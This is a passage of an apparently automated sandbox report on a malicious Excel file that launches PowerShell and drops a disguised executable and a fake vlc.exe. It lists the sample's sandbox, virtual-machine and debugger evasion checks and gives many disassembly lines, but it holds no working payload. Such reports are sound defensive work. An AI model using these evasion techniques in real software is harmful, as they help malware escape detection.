Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe Process information set: NOOPENFILEERRORBOX
Source: 5901777.xls Stream path 'Workbook' entropy: 7.92744162749 (max. 8.0)

Malware Analysis System Evasion:

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: oftmhayq.exe, 00000018.00000002.468670038.0000000002BC9000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.467738260.0000000003439000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\Public\oftmhayq.exe RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\Public\oftmhayq.exe RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains capabilities to detect virtual machines
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_00409A90 rdtsc 29_2_00409A90
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\oftmhayq.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3864
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3310
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5124
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3318
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5744 Thread sleep count: 3864 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5388 Thread sleep count: 3310 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6120 Thread sleep time: -9223372036854770s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1304 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5860 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5832 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6124 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5584 Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4244 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\conhost.exe TID: 5308 Thread sleep count: 39 > 30
Source: C:\Users\Public\oftmhayq.exe TID: 4472 Thread sleep count: 63 > 30
Source: C:\Users\Public\oftmhayq.exe TID: 2288 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\Public\oftmhayq.exe TID: 1012 Thread sleep count: 34 > 30
Source: C:\Users\Public\oftmhayq.exe TID: 6576 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe TID: 4020 Thread sleep count: 59 > 30
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Source: C:\Users\Public\oftmhayq.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\splwow64.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe File opened: C:\Users\user\AppData\
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe File opened: C:\Users\user\
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\
Source: powershell.exe, 00000014.00000002.443336380.000001D222A20000.00000002.00000001.sdmp, powershell.exe, 00000015.00000002.443298742.000001F6E49C0000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.510238912.0000000008220000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 0000001F.00000000.510806745.0000000008640000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: powershell.exe, 00000014.00000002.442866575.000001D222633000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll\
Source: oftmhayq.exe, 00000019.00000002.467738260.0000000003439000.00000004.00000001.sdmp Binary or memory string: vmware
Source: powershell.exe, 00000015.00000002.442626587.000001F6E4550000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: explorer.exe, 0000001F.00000000.501168197.0000000005603000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
Source: powershell.exe, 00000014.00000002.443336380.000001D222A20000.00000002.00000001.sdmp, powershell.exe, 00000015.00000002.443298742.000001F6E49C0000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.510238912.0000000008220000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: powershell.exe, 00000014.00000002.443336380.000001D222A20000.00000002.00000001.sdmp, powershell.exe, 00000015.00000002.443298742.000001F6E49C0000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.510238912.0000000008220000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 0000001F.00000000.515471921.000000000F6C0000.00000004.00000001.sdmp Binary or memory string: War&Prod_VMware_SATA_CD00#5&v
Source: powershell.exe, 00000015.00000002.442626587.000001F6E4550000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: powershell.exe, 00000014.00000002.443094933.000001D222698000.00000004.00000001.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: powershell.exe, 00000014.00000002.443336380.000001D222A20000.00000002.00000001.sdmp, powershell.exe, 00000015.00000002.443298742.000001F6E49C0000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.510238912.0000000008220000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation

Anti Debugging:

Checks if the current process is being debugged
Source: C:\Users\Public\oftmhayq.exe Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_00409A90 rdtsc 29_2_00409A90
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0040ACD0 LdrLoadDll, 29_2_0040ACD0
Contains functionality to read the PEB
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0130513A mov eax, dword ptr fs:[00000030h] 29_2_0130513A
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012F4120 mov eax, dword ptr fs:[00000030h] 29_2_012F4120
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012F4120 mov ecx, dword ptr fs:[00000030h] 29_2_012F4120
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D3138 mov ecx, dword ptr fs:[00000030h] 29_2_012D3138
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D9100 mov eax, dword ptr fs:[00000030h] 29_2_012D9100
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012E0100 mov eax, dword ptr fs:[00000030h] 29_2_012E0100
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012DC962 mov eax, dword ptr fs:[00000030h] 29_2_012DC962
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0139E962 mov eax, dword ptr fs:[00000030h] 29_2_0139E962
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012DB171 mov eax, dword ptr fs:[00000030h] 29_2_012DB171
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013A8966 mov eax, dword ptr fs:[00000030h] 29_2_013A8966
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01391951 mov eax, dword ptr fs:[00000030h] 29_2_01391951
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012FB944 mov eax, dword ptr fs:[00000030h] 29_2_012FB944
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D395E mov eax, dword ptr fs:[00000030h] 29_2_012D395E
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012E61A7 mov eax, dword ptr fs:[00000030h] 29_2_012E61A7
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013551BE mov eax, dword ptr fs:[00000030h] 29_2_013551BE
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013099BC mov eax, dword ptr fs:[00000030h] 29_2_013099BC
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0130C9BF mov eax, dword ptr fs:[00000030h] 29_2_0130C9BF
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013AF1B5 mov eax, dword ptr fs:[00000030h] 29_2_013AF1B5
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013061A0 mov eax, dword ptr fs:[00000030h] 29_2_013061A0
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012F99BF mov ecx, dword ptr fs:[00000030h] 29_2_012F99BF
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012F99BF mov eax, dword ptr fs:[00000030h] 29_2_012F99BF
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013569A6 mov eax, dword ptr fs:[00000030h] 29_2_013569A6
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013949A4 mov eax, dword ptr fs:[00000030h] 29_2_013949A4
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01302990 mov eax, dword ptr fs:[00000030h] 29_2_01302990
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01304190 mov eax, dword ptr fs:[00000030h] 29_2_01304190
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012FC182 mov eax, dword ptr fs:[00000030h] 29_2_012FC182
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0139A189 mov eax, dword ptr fs:[00000030h] 29_2_0139A189
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0139A189 mov ecx, dword ptr fs:[00000030h] 29_2_0139A189
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D519E mov eax, dword ptr fs:[00000030h] 29_2_012D519E
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D519E mov ecx, dword ptr fs:[00000030h] 29_2_012D519E
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0130A185 mov eax, dword ptr fs:[00000030h] 29_2_0130A185
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D8190 mov ecx, dword ptr fs:[00000030h] 29_2_012D8190
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012FD1EF mov eax, dword ptr fs:[00000030h] 29_2_012FD1EF
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012DB1E1 mov eax, dword ptr fs:[00000030h] 29_2_012DB1E1
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D31E0 mov eax, dword ptr fs:[00000030h] 29_2_012D31E0
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013A89E7 mov eax, dword ptr fs:[00000030h] 29_2_013A89E7
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013641E8 mov eax, dword ptr fs:[00000030h] 29_2_013641E8
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013919D8 mov eax, dword ptr fs:[00000030h] 29_2_013919D8
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012E99C7 mov eax, dword ptr fs:[00000030h] 29_2_012E99C7
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012EC1C0 mov eax, dword ptr fs:[00000030h] 29_2_012EC1C0
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012EB02A mov eax, dword ptr fs:[00000030h] 29_2_012EB02A
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01304020 mov edi, dword ptr fs:[00000030h] 29_2_01304020
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0130002D mov eax, dword ptr fs:[00000030h] 29_2_0130002D
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012FA830 mov eax, dword ptr fs:[00000030h] 29_2_012FA830
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01357016 mov eax, dword ptr fs:[00000030h] 29_2_01357016
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D6800 mov eax, dword ptr fs:[00000030h] 29_2_012D6800
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0130701D mov eax, dword ptr fs:[00000030h] 29_2_0130701D
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013A4015 mov eax, dword ptr fs:[00000030h] 29_2_013A4015
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012FF86D mov eax, dword ptr fs:[00000030h] 29_2_012FF86D
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01392073 mov eax, dword ptr fs:[00000030h] 29_2_01392073
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013A1074 mov eax, dword ptr fs:[00000030h] 29_2_013A1074
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01391843 mov eax, dword ptr fs:[00000030h] 29_2_01391843
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D7057 mov eax, dword ptr fs:[00000030h] 29_2_012D7057
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D5050 mov eax, dword ptr fs:[00000030h] 29_2_012D5050
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012F0050 mov eax, dword ptr fs:[00000030h] 29_2_012F0050
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012E28AE mov eax, dword ptr fs:[00000030h] 29_2_012E28AE
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012E28AE mov ecx, dword ptr fs:[00000030h] 29_2_012E28AE
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0130F0BF mov ecx, dword ptr fs:[00000030h] 29_2_0130F0BF
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0130F0BF mov eax, dword ptr fs:[00000030h] 29_2_0130F0BF
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013020A0 mov eax, dword ptr fs:[00000030h] 29_2_013020A0
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013078A0 mov eax, dword ptr fs:[00000030h] 29_2_013078A0
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013190AF mov eax, dword ptr fs:[00000030h] 29_2_013190AF
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D9080 mov eax, dword ptr fs:[00000030h] 29_2_012D9080
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D3880 mov eax, dword ptr fs:[00000030h] 29_2_012D3880
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01353884 mov eax, dword ptr fs:[00000030h] 29_2_01353884
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D58EC mov eax, dword ptr fs:[00000030h] 29_2_012D58EC
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012FB8E4 mov eax, dword ptr fs:[00000030h] 29_2_012FB8E4
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D40E1 mov eax, dword ptr fs:[00000030h] 29_2_012D40E1
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013960F5 mov eax, dword ptr fs:[00000030h] 29_2_013960F5
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012E28FD mov eax, dword ptr fs:[00000030h] 29_2_012E28FD
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0136B8D0 mov eax, dword ptr fs:[00000030h] 29_2_0136B8D0
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0136B8D0 mov ecx, dword ptr fs:[00000030h] 29_2_0136B8D0
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D70C0 mov eax, dword ptr fs:[00000030h] 29_2_012D70C0
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013918CA mov eax, dword ptr fs:[00000030h] 29_2_013918CA
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D78D6 mov eax, dword ptr fs:[00000030h] 29_2_012D78D6
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D78D6 mov ecx, dword ptr fs:[00000030h] 29_2_012D78D6
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0139B0C7 mov eax, dword ptr fs:[00000030h] 29_2_0139B0C7
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0139131B mov eax, dword ptr fs:[00000030h] 29_2_0139131B
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012FA309 mov eax, dword ptr fs:[00000030h] 29_2_012FA309
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01303B7A mov eax, dword ptr fs:[00000030h] 29_2_01303B7A
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012DDB60 mov ecx, dword ptr fs:[00000030h] 29_2_012DDB60
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01366365 mov eax, dword ptr fs:[00000030h] 29_2_01366365
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D7B70 mov eax, dword ptr fs:[00000030h] 29_2_012D7B70
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012EF370 mov eax, dword ptr fs:[00000030h] 29_2_012EF370
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013A8B58 mov eax, dword ptr fs:[00000030h] 29_2_013A8B58
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01303B5A mov eax, dword ptr fs:[00000030h] 29_2_01303B5A
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012DDB40 mov eax, dword ptr fs:[00000030h] 29_2_012DDB40
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012DF358 mov eax, dword ptr fs:[00000030h] 29_2_012DF358
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013A9BBE mov eax, dword ptr fs:[00000030h] 29_2_013A9BBE
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013A8BB6 mov eax, dword ptr fs:[00000030h] 29_2_013A8BB6
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01391BA8 mov eax, dword ptr fs:[00000030h] 29_2_01391BA8
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01304BAD mov eax, dword ptr fs:[00000030h] 29_2_01304BAD
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013A5BA5 mov eax, dword ptr fs:[00000030h] 29_2_013A5BA5
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0130B390 mov eax, dword ptr fs:[00000030h] 29_2_0130B390
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012E1B8F mov eax, dword ptr fs:[00000030h] 29_2_012E1B8F
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01302397 mov eax, dword ptr fs:[00000030h] 29_2_01302397
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0139138A mov eax, dword ptr fs:[00000030h] 29_2_0139138A
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012FEB9A mov eax, dword ptr fs:[00000030h] 29_2_012FEB9A
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0138D380 mov ecx, dword ptr fs:[00000030h] 29_2_0138D380
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D4B94 mov edi, dword ptr fs:[00000030h] 29_2_012D4B94
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0130138B mov eax, dword ptr fs:[00000030h] 29_2_0130138B
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0137EB8A mov ecx, dword ptr fs:[00000030h] 29_2_0137EB8A
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0137EB8A mov eax, dword ptr fs:[00000030h] 29_2_0137EB8A
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D1BE9 mov eax, dword ptr fs:[00000030h] 29_2_012D1BE9
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012FDBE9 mov eax, dword ptr fs:[00000030h] 29_2_012FDBE9
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013003E2 mov eax, dword ptr fs:[00000030h] 29_2_013003E2
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013823E3 mov ecx, dword ptr fs:[00000030h] 29_2_013823E3
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013823E3 mov eax, dword ptr fs:[00000030h] 29_2_013823E3
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013053C5 mov eax, dword ptr fs:[00000030h] 29_2_013053C5
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013553CA mov eax, dword ptr fs:[00000030h] 29_2_013553CA
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012FA229 mov eax, dword ptr fs:[00000030h] 29_2_012FA229
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D4A20 mov eax, dword ptr fs:[00000030h] 29_2_012D4A20
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01391229 mov eax, dword ptr fs:[00000030h] 29_2_01391229
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D8239 mov eax, dword ptr fs:[00000030h] 29_2_012D8239
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012FB236 mov eax, dword ptr fs:[00000030h] 29_2_012FB236
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01314A2C mov eax, dword ptr fs:[00000030h] 29_2_01314A2C
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012E8A0A mov eax, dword ptr fs:[00000030h] 29_2_012E8A0A
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012EBA00 mov eax, dword ptr fs:[00000030h] 29_2_012EBA00
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012EBA00 mov ecx, dword ptr fs:[00000030h] 29_2_012EBA00
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0139AA16 mov eax, dword ptr fs:[00000030h] 29_2_0139AA16
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0139AA16 mov eax, dword ptr fs:[00000030h] 29_2_0139AA16
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012F3A1C mov eax, dword ptr fs:[00000030h] 29_2_012F3A1C
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012DAA16 mov eax, dword ptr fs:[00000030h] 29_2_012DAA16
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012DAA16 mov eax, dword ptr fs:[00000030h] 29_2_012DAA16
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D5210 mov eax, dword ptr fs:[00000030h] 29_2_012D5210
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D5210 mov ecx, dword ptr fs:[00000030h] 29_2_012D5210
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D5210 mov eax, dword ptr fs:[00000030h] 29_2_012D5210
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D5210 mov eax, dword ptr fs:[00000030h] 29_2_012D5210
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0131927A mov eax, dword ptr fs:[00000030h] 29_2_0131927A
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0138B260 mov eax, dword ptr fs:[00000030h] 29_2_0138B260
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0138B260 mov eax, dword ptr fs:[00000030h] 29_2_0138B260
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013A8A62 mov eax, dword ptr fs:[00000030h] 29_2_013A8A62
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01315A69 mov eax, dword ptr fs:[00000030h] 29_2_01315A69
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01315A69 mov eax, dword ptr fs:[00000030h] 29_2_01315A69
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01315A69 mov eax, dword ptr fs:[00000030h] 29_2_01315A69
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01364257 mov eax, dword ptr fs:[00000030h] 29_2_01364257
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01391A5F mov eax, dword ptr fs:[00000030h] 29_2_01391A5F
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0139EA55 mov eax, dword ptr fs:[00000030h] 29_2_0139EA55
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D9240 mov eax, dword ptr fs:[00000030h] 29_2_012D9240
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D9240 mov eax, dword ptr fs:[00000030h] 29_2_012D9240
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D9240 mov eax, dword ptr fs:[00000030h] 29_2_012D9240
